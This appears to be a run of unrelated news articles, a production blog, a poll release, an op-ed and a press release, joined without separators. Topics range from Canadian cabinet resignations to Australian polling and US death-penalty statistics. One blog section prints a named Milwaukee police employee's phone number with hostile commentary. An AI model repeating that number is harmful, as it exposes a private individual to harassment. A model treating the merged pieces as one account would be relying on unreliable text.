resigns as minister of state for the status of women after allegations about her conduct and that of her husband, ex-MP Rahim Jaffer. Harper also removed her from the Conservative caucus, and she was defeated by the Conservative candidate in the 2011 election. Guergis sued Harper and several others over the matter but her suit was dismissed by a judge. Guergis has appealed the decision. 2008 - Maxime Bernier resigns as foreign affairs minister after leaving sensitive documents in his girlfriend's home. He returned to cabinet in 2011 as minister of state for small business.
resigns as foreign affairs minister after leaving sensitive documents in his girlfriend's home. He returned to cabinet in 2011 as minister of state for small business. 2006 - Michael Chong resigns as intergovernmental affairs minister and two other positions in protest of Harper's motion on Québécois as a nation. Chong continues to serve as the Conservative MP for Wellington-Halton Hills. Jim Prentice (Environment) and Gregory Thompson (Veterans Affairs) resigned cabinet posts in 2010 because they were leaving politics or didn't intend to run in the next election.
"While the letter was written with honourable intentions, I realize that it was not appropriate for me, as a Minister of the Crown, to write to the Tax Court," Duncan said in his statement.
"I have therefore offered my resignation as Minister of Aboriginal Affairs and Northern Development to the Prime Minister, which he has accepted."
"I take full responsibility for my actions and the consequences they have brought," Duncan said.
Prime Minister Stephen Harper said while Duncan would continue to serve as an MP, Heritage Minister James Moore will become acting minister of aboriginal affairs and northern development until a new minister is named.
Last month, ethics commissioner Mary Dawson said it was "improper" for Flaherty to have written the letter, and directed him to "refrain from writing such letters in future without seeking approval from her office."
Dawson also rebuked two parliamentary secretaries for improper letter-writing.
Ministers have to stay away from court proceedings because cabinet and the judiciary are separate powers under the Constitution. It's inappropriate for them to be seen as interfering with a judicial or quasi-judicial process. It also violates federal conflict of interest rules.
Mixed reaction
NDP Aboriginal Affairs critic Jean Crowder said that after seeing Harper defend his embattled senators and ministers' conflict of interests, it was "good' to see Duncan take responsibility for his actions.
Duncan, who was at the centre of First Nations' protests during the past few months, was also heavily criticized in 2011 for his handling of a housing crisis in the northern Ontario community of Attawapiskat. He also suffered from poor health and underwent heart bypass surgery in 2010.
"Conservatives have clearly been unable to get the job done on aboriginal issues. At this crucial time in First Nation, Métis and Inuit relations, the prime minister must move quickly to replace Mr. Duncan," said Crowder.
In an interview Friday on CBC News Network's Power & Politics, interim Liberal leader Bob Rae told host Hannah Thibedeau that Duncan is a decent individual. "He's always been very respectful and thoughtful, but it's a huge job."
"I think the government is, on the weekend, going to have to decide to put in a permanent minister quickly," said Rae, adding that "this is a job that requires a person of judgment and I hope the government can find somebody."
Grand Chief Stan Louttit, of the Mushkegowuk territory that includes the First Nations community of Attawapiskat, said that Duncan's resignation did not come as a surprise.
"What has he accomplished in his term as [aboriginal affairs] minister besides confusion, anger and distrust in government," said Louttit in a written statement to CBC News, adding that he hopes the prime minister will involve First Nations leadership in the selection of a new minister.
'An honourable man'
Congress of Aboriginal Peoples National Chief Betty Ann Lavallée said she was saddened to hear of Duncan's resignation.
"Over a number of years, I have gotten to know Mr. Duncan quite well. He is an honourable man who was doing his best to improve the lives of all Aboriginal Peoples throughout Canada. His contributions in moving the aboriginal agenda forward will not be forgotten," said Lavallée.
Duncan's resignation comes at a time when the federal government and the Assembly of First Nations leadership are negotiating over treaty issues and land-claim settlements, issues brought to the fore by the Idle No More movement and a six-week-long hunger strike by Attawapiskat Chief Theresa Spence.
The federal government is also consulting with First Nations on aboriginal education in the hopes of passing new legislation early next year that would include educational standards for aboriginal children.
Last week, three Liberal senators, all of them aboriginal, walked out of a committee meeting as Duncan was defending the need for his government's proposed Bill C-27, the First Nations accountability act, which does not have the unanimous support of the AFN.
All eyes will also be on the federal government to see how the next budget with impact First Nations and the Department of Aboriginal Affairs and Northern Development.
Today, we were back on Hyperion-8, shooting Day 2 of Episode #201.
Moon-base! Mooooooon-base! First scene up called for some major reinforcement of the corridor wall to withstand the, uh, “actor action”. But director Amanda Tapping had it all figured out.
We're heading this way in the coming days. Please observe the regulations and mind the lights.
Stand-in Alyssa Pawlak steps in (and up) for…someone a little taller.
We lock up director Bruce McDonald in solitary to give him a real feel for prison life.
The geodesic half-dome forms the upper structure of THIS scary structure. Please answer in the form of a question.
“The Pen”. Mind your toes and fingers!
A little something for…someone.
Warden Treihan wardrobe.
Misaki Han wardrobe.
Anthony Lemke drops by the office for his monthly reprimand.
The Episode #202 stunts and SPFX meeting. This one's going to be huge. We're talking a half-dozen extended action sequences in addition to about a dozen smaller ones.
Stunt coordinator John Stead is going to have his hands full with this episode.
Finally, check out the hair evolution – transforming dark-haired Jodelle into bright-haired FIVE!
Finally finally – Melanie Liburd, Dark Matter's newest crew-member, Nyx, arrived in Toronto today for her very first costume fitting. She is LOVELY!
Share this: Facebook
Twitter
Pinterest
Email
Print
More
Tumblr
WhatsApp
Pocket
LinkedIn
Reddit
Like this: Like Loading...
Finding No. 6446 – This multi-mode Morgan Poll on Federal voting intention was conducted via face-to-face and SMS interviewing over the last two weekends August 29/30 & September 5/6, 2015 with an Australia-wide cross-section of 2,653 Australian electors aged 18+, of all electors surveyed 2% (unchanged) did not name a party.
Primary support for the L-NP has decreased to 36.5% (down 2%) while ALP support is down 0.5% to 35.5%. Support for the Greens has risen to a new record high of 16.5% (up 2.5%), Palmer United Party is 1% (down 0.5%), Katter's Australian Party 1.5% (unchanged), while Independents/ Others are at 9% (up 0.5%).
This week's Morgan Poll on Federal voting intention was conducted over the last two weekends, August 29/30 & September 5/6, 2015, with an Australia-wide cross-section of 2,653 Australian electors.
Roy Morgan Government Confidence Rating
The Roy Morgan Government Confidence Rating has fallen 5.5pts to 90pts this week with 46.5% (up 2%) of Australians saying Australia is ‘heading in the wrong direction' and only 36.5% (down 3.5%) saying Australia is ‘heading in the right direction'.
Analysis by Gender
Analysis by Gender shows a majority of both genders supporting the ALP. Women: ALP 56.5% (up 1.5%) cf. L-NP 43.5% (down 1.5%); Men: ALP 53.5% (unchanged) cf. L-NP 46.5% (unchanged).
Analysis by Age group
Analysis by Age group shows the ALP still with its strongest advantage among young family aged Australians (aged 25-34). 18-24yr olds favour the ALP 56.5% cf. L-NP 43.5%; 25-34yr olds most heavily favour the ALP 66% cf. L-NP 34%; 35-49yr olds favour the ALP 57% cf. L-NP 43% while 50-64yr olds favour the ALP 54.5% cf. L-NP 45.5% and those aged 65+ easily favour the L-NP 55.5% cf. ALP 44.5%.
Analysis by States
The ALP now has a two-party preferred lead in all Australian States. Tasmania: ALP 61.5% cf. L-NP 38.5%, Victoria: ALP 59% cf. L-NP 41%, South Australia: ALP 57.5% cf. L-NP 42.5%, New South Wales: ALP 53% cf. L-NP 47%, Queensland: ALP 52% cf. LNP 48% and Western Australia: ALP 51% cf. L-NP 49%.
The Morgan Poll surveys a larger sample (including people who only use a mobile phone) than any other public opinion poll. The Morgan Poll asks Minor Party supporters which way they will vote their preferences. *News Corp's poll does not measure or reference the PUP vote!
The Morgan Poll allocated preferences based on how people say they will vote – allocating preferences by how electors voted at the last Federal Election, as used by News Corp's poll* shows the ALP (55.5%) cf. L-NP (44.5%) – for trends see the Morgan Poll historic data table.
Gary Morgan says:
“In early September L-NP support is virtually unchanged at 45% (down 0.5%) cf. ALP 55% (up 0.5%) on a two-party preferred basis. However, Roy Morgan Government Confidence has fallen to 90pts (down 5.5pts) with only 36.5% (down 3.5%) of Australians saying Australia is ‘heading in the right direction' compared to 46.5% (up 2%) that say Australia is ‘heading in the wrong direction'. “The fall in Roy Morgan Government Confidence is not surprising given a number of negative economic indicators last week. The ABS released Australian GDP growth figures for the June Quarter 2015 showing the Australian economy grew by only 0.2% in the three months to June 2015 and by only 2% over the year to June. This is the slowest growth rate since the March Quarter 2011. “In addition to poor growth figures, the Australian All Ordinaries share index dropped by over 4% last week. After beginning last week at 5,274.70 the Ordinaries closed the week at 5,060.80 – a drop of 213.9pts (-4.1%). Following the downtrend in the Australian share-markets was a continuing fall in the Australian Dollar which has now fallen below 70 US cents for the first time in over six years since early 2009. “However, what should be of the greatest concern to the Abbott Government as it faces re-election in the next 12 months is Australia's ‘army' of unemployed and under-employed. Last week's Roy Morgan August unemployment (9.2% - 1.18 million) and under-employment (7.4% - 944,000) estimates show there are still more than 2.11 million Australians (16.6%) looking for a job or looking for a new job. This figure remains far too high and is the biggest challenge facing the Government as it deals with the end of the mining boom and the imminent closure of the Australian car manufacturing industry over the next two years. “Although two-party preferred voting intention is barely changed this week, falls for both of the major party primary votes – L-NP 36.5% (down 2%) and ALP 35.5% (down 0.5%) shows voters are looking for alternatives. This is clearly demonstrated by the increased support for the Greens under new leader Richard Di Natale – now at a record high 16.5% (up 2.5%)."
Electors were asked: "If an election for the House of Representatives were held today – which party will receive your first preference?”
Visit the Roy Morgan Online Store to browse our range of Voter Profiles by electorate, detailed Voting Intention Demographics Reports and Most important Political Issue Reports (all 150 electorates ranked by an issue).
Finding No. 6446 – This multi-mode Morgan Poll on Federal voting intention was conducted via face-to-face and SMS interviewing over the last two weekends August 29/30 & September 5/6, 2015 with an Australia-wide cross-section of 2,653 Australian electors aged 18+, of all electors surveyed 2% (unchanged) did not name a party.
For further information:
Contact Office Mobile Gary Morgan: +61 3 9224 5213 +61 411 129 094 Michele Levine: +61 3 9224 5215 +61 411 129 093
Data Tables
Margin of Error
The margin of error to be allowed for in any estimate depends mainly on the number of interviews on which it is based. The following table gives indications of the likely range within which estimates would be 95% likely to fall, expressed as the number of percentage points above or below the actual estimate. The figures are approximate and for general guidance only, and assume a simple random sample. Allowance for design effects (such as stratification and weighting) should be made as appropriate.
Survivorman Bigfoot season 2 kicked off an April 1st with its premiere episode as Les Stroud continues his search for Bigfoot.
The new season of Survivorman Bigfoot will feature six new episodes in all and promises to have some interesting developments in store. The new episodes of Survivorman Bigfoot season 2 are set to air on the Discovery Channel on Wednesdays at 8 PM Central along with The Science Channel the following Friday of each week at 9 PM Central.
The premiere of the new season called Survivorman: Bigfoot Legend of Klemtu Hill kicked things off with a blast and the remainder of the upcoming episodes should be even better. Here is some information about the 2015 Survivorman Bigfoot season 2 upcoming episodes one of which is in Alberta along with others in Northwest California and the Canadian Rockies.
“Alberta Foothills.” Evidence of Sasquatch activity has been found in rural Alberta. Stroud, who knows the Canadian wild better than almost anyone, is able to approach the territory with a skeptic's eye, determining what traces could be real and what could be attributed to other activity. Relying on stealth camera equipment, along with infrared trail cams and thermal imaging, he seeks to go straight to the source and discover the creature—or other force—that's been baffling scientists for generations. Airs Wednesday, April 8 on Discovery Channel at 9/8 Central and on The Science Channel on Friday, April 10 at 10/9 Central “Hoopa.” With nearly a lifetime of tracking experience, Stroud may be able to find traces of Bigfoot in the land of the Hoopa Valley Tribe. Surrounded by ancient red cedar forests in northwest California, it's easy to get lost in the giant shadows, which hide dense black bear territory. Here, Stroud is determined to get irrefutable proof of Bigfoot by catching the creature on film. But first, he must learn about the area. Stroud spends time getting to know the locals and hears tales of sightings over the years, before offering himself to the wilderness, seeking to make the connection of a lifetime. Airs Wednesday, April 15 on Discovery Channel at 9/8 Central and on The Science Channel on Friday, April 17 at 10/9 Central “Mountain.” The grizzly bear territory is the most remote and dangerous territory of the Canadian Rockies. Here, audio has been captured during a near-fatal encounter, presumably with the Sasquatch. Stroud sets out to the location of the incident, armed with hidden cameras, pheromone chips, hand bells, chimes and testing kits. His goal: to get DNA proof of Bigfoot. It turns out, he's got a long night ahead of him, filled with strange noises and giant grizzly footprints. By thinking like an animal, he hopes to make a new discovery. Airs Wednesday, April 22 on Discovery Channel at 9/8 Central and on The Science Channel on Friday, April 24 at 10/9 Central.
Here's a telling sign that the storm over FBI Director James Comey's testimony before the Senate Intelligence Committee took its toll on President Donald Trump: He went MIA on Twitter for nearly 46 hours, the longest social-media silence since his inauguration on January 20.
Thursday also marked only the second day since Trump entered the White House that he did not issue a single tweet.
The last day that happened? April 15 — the Saturday before Easter when Trump spent the weekend in Mar-a-Lago, Florida, and Trump opponents in cities across the country used Tax Day as an excuse to protest and demand the release of the president's tax returns.
Also Read: Trump Lawyer Responds to Comey Hearing: 'President Feels Completely Vindicated' (Video)
Trump broke his Twitter silence early Friday morning with a slam on “leaker” Comey for “so many false statements and lies.”
Despite so many false statements and lies, total and complete vindication…and WOW, Comey is a leaker! — Donald J. Trump (@realDonaldTrump) June 9, 2017
But that came after a record 45 hours, 53 minutes after his previous tweet, a preview of his trip to Cincinnati to discuss “Healthcare & also Infrastructure” that went out on Wednesday at 8:17 a.m. ET — more than a day before Comey made his appearance on Capitol Hill.
Getting ready to leave for Cincinnati, in the GREAT STATE of OHIO, to meet with ObamaCare victims and talk Healthcare & also Infrastructure! — Donald J. Trump (@realDonaldTrump) June 7, 2017
The longest previous social-media dry spell lasted 39 hours, 37 minutes — from 4:41 p.m. on April 14 to 8:18 a.m. on Easter Sunday, April 16 — not counting a retweet of wife Melania Trump touting the White House Easter Egg Roll sent around 4:46 p.m., according to the Trump Twitter archive.
He also had a nearly 25-hour lull beginning on the afternoon of May 16, nearly two hours before the New York Times posted a bombshell report the president had asked then-FBI Director James Comey to end its investigation of former National Security Adviser Michael Flynn, according to a memo Comey had written about their February conversation.
Also Read: 5 Trump 'Lies' From Comey Hearing - and 1 Truth (Video)
But Trump showed uncharacteristic restraint in terms of social media use on Thursday even as Comey delivered harsh testimony about his encounters with the president before his firing last month.
The president's son, Donald Trump Jr., did tweet several times during the hearing (“Is this a joke?” was one representative tweet).
Trump's longtime personal lawyer, Marc Kasowitz, also delivered a televised rebuttal of Comey's testimony, saying, “the president never pressured Mr. Comey” and he “feels completely vindicated.”
That the death penalty is administered in a fair and equitable fashion within the federal system is belied by the vastly divergent facts on the ground
The arbitrary nature of the death penalty as practiced in the US is laid bare in a new study that shows that just 2% of counties across the nation have generated most of the executions in the past 40 years.
A new report from the Death Penalty Information Center in Washington shows that of the 1,348 executions that have taken place in the US since the death penalty restarted in 1976, more than half originated in only 2% of counties. Under the US judicial system, the decision to launch a capital case lies with district attorneys at the county level.
Put another way, 15% of the counties of America have given rise to all the state executions to be carried out in the modern era. The argument that has been played out at the highest levels of US jurisprudence, that the death penalty is administered in a fair and equitable fashion within the federal system, is belied by the vastly divergent facts on the ground.
The finding of such unequal distribution – including the fact that all of the 3,125 inmates currently on death row in America came from just 20% of the counties – has potentially significant legal consequences. The US supreme court imposed a ban on the death penalty in 1972 on grounds that it was practised in an arbitrary and random fashion, and only allowed it to restart four years later once new guidelines had been issued to jurors.
But as Richard Dieter, director of the Death Penalty Information Center, points out, his study shows that the ultimate punishment is today anything but consistent in its application. "It is becoming clear that it comes down simply to which side of the county line you were standing in when you committed a murder that can put you on death row – it's nothing to do with the heinousness of the crime. There are wild disparities between counties."
Even within the state of Texas, which carried out 15 executions last year, the discrepancies are wide.
Just four of its 254 counties – Harris, Dallas, Tarrant and Bexar – account for almost half of the 492 executions Texas has carried out since 1976. Harris county alone, around the city of Houston, has carried out 115 executions, a record number that in no small part can be explained by the particular affinity for judicial killings of its then-district attorney in the 1990s.
Many of the counties leading the league tables are cities with larger population sizes, but that does not explain the distortion. The four counties of Texas produce nearly 50% of the state's executions while holding 34% of its overall population.
Other counties that produce a high volume of capital cases include St Louis in Missouri, Tulsa and Oklahoma counties in Oklahoma, and Maricopa in Arizona.
While nobody expects the US supreme court to reconsider the issue of arbitrariness any time soon, politically, the disparities are starting to have an impact because of their financial implications. The death penalty is not cheap: on average it costs about $3m to achieve a death sentence, and if you add up all the costs through to actual execution that figure can escalate to $30m.
Most of those costs are borne by taxpayers in the states that still apply the practice – last year only nine states executed prisoners. Within those states, 85% of counties have produced no death sentences at all in the past four decades, so their residents are carrying enormous costs with none of the perceived benefits of sending anyone to death row.
"People are starting to realise that not only is the death penalty highly expensive, it is also extremely narrowly applied," Dieter said.
That syndrome was evident in Maryland, which abolished the death penalty in May. One of the prime arguments used by abolitionists was that the massive costs of Maryland's death row were being carried by all of the state's taxpayers, when the overwhelming number of the inmates had come from just one county – Baltimore.
Negreet High School
The parents of a Buddhist student who filed suit against the Sabine Parish School Board, alleging their son was subjected to religious harassment for not being of the Christian faith, have reached a settlement.
(Sabine Parish School Board website)
Officials in a western Louisiana school system and the American Civil Liberties union have settled a lawsuit sparked by the treatment of a Buddhist sixth-grader whose parents say he was harassed at a school where officials routinely pushed Christian beliefs.
The January lawsuit alleged, among other things, that a teacher at Negreet High School in Sabine Parish declared that Buddhism was stupid. It also said the school regularly incorporated Christian prayer into classes and school events and scrolled Bible verses on an electronic marquee in front of the school.
The agreement filed Friday in U.S. District Court in Shreveport contains a long list of prohibited practices. For instance, it says school officials won't discourage or encourage religious activities; they won't assign readings from religious texts, absent a non-religious educational purpose; and they won't express their personal religious beliefs in class or at school events.
"No child should feel that a teacher is trying to impose religious beliefs, and this agreement ensures that this will no longer be the case at Sabine Parish schools," said Marjorie Esman, executive director of the ACLU of Louisiana. "We're glad the school board worked with us to bring this matter to a quick and amicable resolution."
The lawsuit was filed against the Sabine Parish School Board on behalf of Scott and Sharon Lane and their three children. According to the complaint from the ACLU and its Louisiana chapter, the Lanes' son — a lifelong Buddhist of Thai descent — quickly became the target of harassment at Negreet.
Among the defendants in the suit, aside from the school board, was science teacher Rita Roark, who taught students that "the earth was created by God 6,000 years ago, that evolution is 'impossible' and that the Bible is '100 percent true.'"
A test she gave included religious references that included this fill-in-the-blank entry: "Isn't it amazing what the ______ has made!!!!"
When the Lanes' son "did not write in Roark's expected answer (LORD), she belittled him in front of the rest of the class," the lawsuit said.
The January lawsuit said Negreet officials refused to stop the practices when the Lanes complained, but allowed the boy to attend another school in Many, La.
The agreement filed Friday, known legally as a consent decree, includes an award of $4,000 to Sharon Lane to cover her past costs of transporting the boy to Many. The board also will provide him with bus transportation as he continues to attend school in Many.
Sunday, 25 September 2016 04:44
By Dr Farsalinos
Science is about being open-minded, engaging into an open debate, respecting the different opinion (even when you disagree) and exchanging views, arguments and ideas. This is how science progresses. Dialogue is an absolute necessity. On the contrary, secrecy, censorship, exclusions and intimidation are not only useless but dangerous.
Perhaps it is not surprising, but it is certainly discouraging, to see that several scientists have recently received letters from the organizations Campaign for Tobacco-Free Kids (CTFK) and European Network for Smoking and Tobacco Prevention (ENSP), informing them that the 2016 Global Tobacco & Nicotine Forum conference (GTNF), in which they were invited, includes participation of the tobacco industry and organizations related to the tobacco industry. They list some tobacco and tobacco-related companies as participants to the conference. They even included PriceWaterhouseCoopers, an accounting firm, in the list of “inappropriate” (my word) participants, probably because it has clients from the tobacco industry. The authors of the letter (signed by the two organizations but not by any particular person) called the scientists to cancel their participation to the conference. Some perceived this as a demand, not a call. Expressions like: “your involvement with an industry that has been misleading and deceiving the general public for many decades could be not only detrimental to your reputation but also the notoriety of your affiliated association or institution”, can be perceived as indirect threats of initiating an attempt to discredit scientists and create problems in their working environment, not because of bad science but because they should be present, discuss with, confront or even criticize the tobacco industry when the latter are present. It is impressive that the participation to a conference is considered as “involvement with an industry”. Moreover, it seems to be perceived as a positive sign that “some initial presenters have immediately cancelled their participation”. Other expressions (such as: “As professionals with high credibility, who should be placing patients' health and well-being as their highest priority,…” (my emphasis) could be perceived as insulting.
If these organizations want to do something productive, they should seek to participate to these events. Yes, the tobacco industry has repeatedly lied in the past. Yes, they sell a deadly product. Of course we need to be very cautious with their data, motivation and strategies, and I have repeatedly mentioned that their research should be verified by independent studies. The cautious and critical approach is needed because of the past history and tactics of the tobacco industry. But this is different from hiding and censoring research, or pretending it does not exist. Some feel that the only goal should be the destruction of the tobacco industry, and this effort is evolving over many years. I am not sure if you can consider this a successful strategy when the share price of some tobacco companies have increased by 100-240% over the last 10 years. Some have used the article 5.3 of the WHO FCTC as an argument against the participation of scientists in conferences where the industry is present. The article refers to the Parties of the FCTC, not to scientists. Moreover, are the Parties really respecting this article? What about those Parties who are members of the FCTC and at the same time own tobacco companies?
Therefore, the need for scientific debate is now more imminent than ever. Scientists need to influence, press and even encourage the industry to change course and switch to the development and marketing of safer and more effective harm reduction products. If they do not actively and rapidly make this switch, the fight against smoking will never end and smokers will continue to die annually, as they do today. Participation to a conference where the industry is present is a good opportunity to criticize them, to apply pressure to change, to present the ethical dilemmas that we face in dealing with the smoking epidemic and to discuss the best and most feasible approach in reducing smoking-related disease and death.
The situation today can be characterized as academic obscurantism and McCarthyism. It is not just the letter sent to scientists about the GTNF conference. In the past we have seen criticism unrelated to the scientific content, such as “accusing” scientists and journals for publishing research from tobacco scientists (without even mentioning a single problem in the content of the study) and criminalizing evidence-based opinion and, now, participation to a scientific conference. Criticism is welcomed and needed when it is focused on the scientific content. Personal insults, direct or indirect threats and attacks on the scientific, personal and professional integrity are not only inappropriate but can also be considered as defamation and have legal implications. Public health has been divided into two opposing groups (pro and against harm reduction) which never meet or participate in the same conference to exchange ideas and present their arguments collectively in an honest, open and public debate. Is this what public health and smokers deserve? Is this going to solve the problem of smoking? Is this scientific progress? Does anyone really believe that the more than 1 billion smokers worldwide do not deserve our immediate attention, sympathy and care? Are we willing to sacrifice more generations? Is the health of everyone (including smokers) our first and most important priority, or not?
Public health needs a “new deal”. Every side needs to engage into an open dialogue. The current situation of parallel monologues (avoiding direct confrontation), the “political game” which is distanced from science, and the media hunt to intimidate smokers and to promote unsubstantiated claims need to stop. Scientists from “both sides” need to find ways of merging, rather than distancing, their approach. Accusations from one side to the other should stop. The current situation is creating confusion and allows the establishment of major misconceptions among smokers. This is not promoting the interests of public health and our goals. It is time for science to come to the table, become the priority and dominate in all discussions.
BitFenix have been at the top of the PC case list for many years with products like the mini-ITX Prodigy case and Shinobi offering builders a platform to create some of the most stunning builds we've ever seen. But it is not cases that are making the headlines for BitFenix today, but rather their new Whisper M power supply that is aimed at the premium market with some serious power efficiency statistics.
The new range of premium power supplies which comes in 450W, 550W, 650W, 750W and 850W all offer an 80+ Gold Efficiency rating with an outstanding 92 percent efficiency at typical loading. And in case you were wondering about the name, there is a reason that BitFenix went with “Whisper” which is thanks to use of “Intelligent Fan Control Curve and a 135mm FDB fan that starts working at a much lower voltage of 3.5v the fan can operate at 500rpm ± 10%.”. Along with these operating features that ensure a silent build, there is also the addition of a dedicated quad rail design which has been laid out with dedicated rails for “Motherboard + Peripherals, CPU, GPU 1 and GPU 2”, with all rails fitted with Overcurrent Protection.
No details have been shared regarding pricing or availability, but the full press release can be seen below:
“BitFenix introduced their first premium power supplies a couple of years back with pre-sleeved cables and high quality components. Now they are ready to introduce to you their newest range of power supplies that boast of extreme quality, with the world's best performance at 80+ Gold certified efficiency and up to 92% efficiency at typical loading. The new BitFenix Whisper power supply line up comes with a wide range of power options starting with 450W all the way up to 850W in 100w increments.
Silent Operation
As the name suggests, Whisper is an extremely silent power supply with an 80+ Gold Certified efficiency. Because of the high efficiency layout and use of high quality components, the Whisper is capable of functioning with a very low noise and heat level whilst providing stable currents at high loads. Thanks to the use of an Intelligent Fan Control Curve and a 135mm FDB fan that starts working at a much lower voltage of 3.5v the fan can operate at 500rpm ± 10%. Because of these unique features together with ultra-low noise levels and high life expectancy of the fan, BitFenix Whisper can operate at noise levels lower than 18dBA while PSU load is lower than 60% at 25°C.
High Efficiency
Whisper is rated at a Power Factor of 0.99, and is extremely efficient with an 80+ Gold efficiency certification. With 87+ (0% to 100% load)/ 90+ (40% to 70% load) high efficiency design, Whisper saves both energy and money for the user while providing extremely stable power output at a very low noise level, generating up to 80% less heat and consuming 30% less power than standard PSU's. BitFenix Whisper also fully supports Intel C6/C7 Sleep States and 100-240V (90V min to 264Vmax) Full range AC Input design for worldwide usage. With LLC, Active PFC & DC-to-DC circuit with an 80+ Gold Certificate, BitFenix Whisper Power Supply saves energy and your environment while providing unmatched power quality for your computer hardware.
Dedicated Quad Rail Design
A dedicated quad rail design together with an advance voltage switching circuit from +12V to minor rail provides the best stability and output quality. Due to the use of a separate DC-to-DC circuit to convert +12V to +5V and +3.3V, the output current from the Whisper is much more stable and smooth. The main quad +12V rails on all BitFenix Whisper models are dedicated as Motherboard + Peripherals, CPU, GPU 1 and GPU 2 (450W and 550W models only come with GPU1). All of these rails have dedicated Overcurrent Protection (OCP) circuits which protects components from damage due to over current and makes sure any failed component does not damage other components. Whisper can deliver full power on +12V rails due to the use of practically set current load limits on different rails. Unlike on traditional Multi Rail PSUs, Whisper have a higher current capacity on GPU Rails and other rails to support even the most power hungry graphics cards and other components based on the actual demand. So now you don't have to worry about the maximum current each rail can provide. To further ease the use of multi rail design, the user can easily refer to the labeled power distribution table printed directly on the PSU.
Fully Modular Design
Performance is not the only focus of BitFenix Whisper, as not only are they built to a simplistic yet elegant design, the BitFenix Whisper models are also fully Modular. These cables are 18AWG thick output DC cables and for the CPU & PCI-E 2.0 they are 650mm long to fit in virtually any chassis. The specially designed flat ribbon-style cables and connectors feature electronic monitoring components to stabilize the power delivered to the hardware, both increasing the durability and the overclocking potential of the components. This further reduces the power drop caused by modular connections and makes sure the components get enough power to operate at optimum levels. Combined with the BitFenix Alchemy 2.0 CSR kit, the BitFenix Whisper can be showcased with high quality single sleeved cables in any build.
Stable Power Delivery
BitFenix Whisper power supplies uses 100% Japanese Industrial Capacitors ensuring tight DC voltage regulation within ±2% and extremely long component life. Unlike standard Japanese Capacitors which are rated to work at a maximum temperature of 85°C, the Japanese Industrial Capacitors available in the Whisper series can function at a maximum temperature of 105°C. This means the noise and fluctuation of current on high loads and high temperatures levels is lowered while the lifespan of all components is increased. On top of that, LLC resonant topology brings lower power losses and boosts higher efficiency during AC-DC voltage switching. BitFenix Whisper uses solid Capacitors to reduce up to 35% of ripple & noise to the motherboard that results in solid performance and high overclocking stability. All these extreme features are added together with a cleaner layout and design that reduces the ripple created by components on each other. With availability of dual CPU 4+4pin cables on 750W and 850W, BitFenix Whisper not only supports mainstream systems, but also extreme over-clocking motherboards, dual CPU setups, Industrial servers and workstations. The power stability and the low ripple noise of the Whisper power supply is one of the best and what over-clockers and gaming enthusiasts dream of.
Industrial Level Protection
Power regulation and protection is critical to increase the durability of the components and safeguard the data. BitFenix Whisper power supplies come with numerous protection mechanisms to protect both the power supply and components from poor power delivery.
• Overcurrent Protection (OCP),
• Overvoltage Protection (OVP),
• Under Voltage Protection (UVP),
• Over Power Protection (OPP)
• Short Circuit Protection (SCP),
• Over Temperature Protection (OTP)
• No Load Operation (NLO),
• Surge & Inrush Protection (SIP)
Extended Warranty
BitFenix Whisper together with all the above premium features is covered by 7 years of warranty and BitFenix Online Support is available to answer any questions or concerns regarding all BitFenix Products.”
57 SHARES Facebook Twitter Google Reddit Tumblr Digg Linkedin Stumbleupon Mail Print
Milwaukee police may have gone too far this time. It appears they beat a man death. But his final 10 minutes on this earth were caught on an MPD dash cam and they are excruciating to watch.
As I've followed this story from It's breakage, I've been unable to watch the entire video. I'll do so after posting this.
According to Milwaukee Journal Sentinel:
A special prosecutor is considering felony charges in connection with the death of Derek Williams in Milwaukee police custody in July 2011, according to documents filed late Friday in Milwaukee County Circuit Court. The special prosecutor, John Franke, plans to ask jurors to consider charges of first- and second-degree reckless homicide and failure to render aid by law enforcement after he presents five days' worth of witnesses during an inquest into Williams' death, scheduled to begin Feb. 11. Those witnesses will include independent medical experts who will likely discuss a cracked bone in Williams' neck and sickle cell crisis, a controversial condition Assistant Medical Examiner Christopher Poulos blamed for Williams' death. The homicide charges are felonies. First-degree reckless homicide carries a maximum possible penalty of 40 years in prison. Second-degree reckless homicide carries a maximum prison term of 15 years. The charge of failure to render aid is a misdemeanor with a possible penalty of nine months in jail. A felony conviction requires a police officer to be removed from the force. A misdemeanor conviction related to on-the-job conduct also may be cause for firing. Attorney Robin Shellow, who represents Williams' mother, said the poten tial charges proposed by Franke will give inquest jurors a chance to fairly hold officers accountable. “He is allowing the jury to have outrage, apply the evidence and really think about what it is that defines the illegality of the conduct,” she said of Franke. The documents are the first public indication of the seriousness of the charges Franke is considering against the Milwaukee police officers involved in Williams' arrest. Read more…
Feel free to voice your opinion on MPD's Facebook page. According to the page info “We reserve the right to delete any postings on this site or ban any users at the discretion of the Administrator.” This basically means they'll delete any comment which does not fully support all of their “officer's” actions. I am personally permanently blocked.
MPD employee Mark Stanmeyer runs this first amendment hating page and his number is 414-935-7209.
57 SHARES Facebook Twitter Google Reddit Tumblr Digg Linkedin Stumbleupon Mail Print
EPN
The woman in this portrait doesn't actually exist. The face is actually the average of 57 different women — 57 girlfriends that appeared in episodes of the popular TV sitcom Seinfeld.
The image is actually the latest appropriation artwork by photographer Richard Prince, who says he found photographs of 57 of the girlfriends on Google.
He then took the images, printed them as 8×10-inch photos, and handed the prints off to Two Palms Press to have them turned into the composite seen above.
Through his Twitter account, Prince revealed that one of the 57 faces was this newspaper photo of Sarah Silverman (she appeared in the episode “The Money“):
Prince has been exhibiting the artwork, titled “Jerry's Girl,” and is planning to sell it as a limited edition of 57 prints.
If you find this concept of blended portraits interesting, be sure to check out this project in which a young woman averaged 500 of her self-portraits, and this project featuring the average faces of women in 40 countries around the world.
(via ANIMAL NY via Mashable)
P.S. Late last week, we reported that a judge had overturned a previous copyright infringement ruling against Prince, finding that his use of photographer Patrick Cariou's photos was “fair use.”
Image credits: Photographs by Richard Prince
"He jumps every hurdle, he puts light in dark situations, he's magic."
That's how Sonya Whittaker describes her 12-year-old son Campbell Remess, who spends his free time sewing teddy bears for charity.
Campbell, from Acton Park in Hobart, Tasmania, was inspired to create the bears after he asked his parents if he could buy Christmas presents for kids in hospital, but was told it would cost too much money.
He then decided to create the gifts himself, and vowed he would make one a day - 365 a year - and give them all away to charity.
His bears have been sent to people in need of comfort around the world, from patients suffering from cancer in Australian hospitals to victims of terror attacks in Paris and Brussels.
This morning Campbell was treated to a surprise of his own, when the TODAY Show's Stevie Jacobs showed up at his door to announce he had been declared the first of the program's "Little Heroes".
TODAY teamed up with Qantas to give the family of 11 tickets to go to the Sunshine Coast in Queensland, plus accommodation, plus car hire and tickets to Australia Zoo, and $1000 cash.
He will also get a chance to visit the Queensland teddy bear workshop Fur Addiction.
TODAY will travel the country to find more Little Heroes throughout this week.
© Nine Digital Pty Ltd 2019
